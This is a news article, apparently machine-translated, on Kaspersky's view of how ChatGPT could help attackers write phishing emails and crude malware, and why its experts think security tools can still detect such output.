Monitor the impact of ChatGPT on digital security |
Kaspersky examines how the general use of a popular artificial intelligence application (ChatGPT) can affect the rules of the world of digital security.
The move comes just months after OpenAI introduced ChatGPT as one of its most innovative AI software models to date.
The new app can explain complex scientific concepts in a way that outperforms many teachers, and it can compose music scores, create lyrics, and pretty much everything at the user's request.
(ChatGPT) is basically an AI-based language model that can generate disguised text that is difficult to distinguish from human-written text, which has attracted the attention of cybercriminals who are trying to apply this technology to generate text for chat writing. Phishing attacks were very costly after all targeted emails were written, which prevented them from launching phishing campaigns on a large scale.
But the application (ChatGPT) promises to change the balance of power radically, as it allows attackers to craft phishing emails that are disguised because they are written in personal language, even if it is widely shared.
The app can also customize the communication style and generate fake emails, but they are written in language so convincing that they appear to come from co-workers, which means the number of successful phishing attacks can increase.
Many users have discovered that (ChatGPT) can generate code including: malicious types, so creating an information stealing software tool would be easy and possible without any programming knowledge.
However, cautious users need not worry, as a security solution capable of detecting malware written by individuals can detect and neutralize their bot counterparts just as quickly.
While some analysts worry that ChatGPT will create malware tailored to each individual victim, Kaspersky experts believe that these versions of the software still display malicious behavior that security solutions can detect. Malware written by a botnet can also contain hidden bugs and logic errors, which means that full automation of a botnet's encryption has yet to be achieved.
Those responsible for defending and securing systems can make use of the application (ChatGPT), although it can also be useful to cybercriminals because it can, for example, quickly "explain" what a particular piece of code is compatible with specific security operations in its site. . The essence of the requirements, busy analysts must allocate a minimum amount of time to each digital event so that they can accept any tool to accelerate their work.
It is likely that in the future, users will see many specialized products, such as: a model based on reverse engineering to improve understanding of code, a model (CTF) for solving security problems, a model for searching for security vulnerabilities, and others.
Vladislav Toshkanov, a security expert at Kaspersky, said that ChatGPT can help attackers in various situations, such as creating fraudulent emails in a disguised way, even if you did not perform any malicious actions.
Toshkanov pointed out that the application is not yet ready to become an artificial intelligence that performs self-hacking, noting that the malicious code generated by the neural network will not work at all on its own and needs to be improved and exploited by technicians.
Toshkanov added, "While ChatGPT will not have an immediate impact on the field of digital security today, future generations of AI could have an impact."
He also said, “In the next few years, we are likely to see large language models trained in natural language processing and encoding being adapted to handle specialized digital security use cases. These changes affect a wide range of digital security activities, from threat detection. Therefore, Digital security companies will want to understand the opportunities that new tools will open as they understand how this technology can help cybercriminals.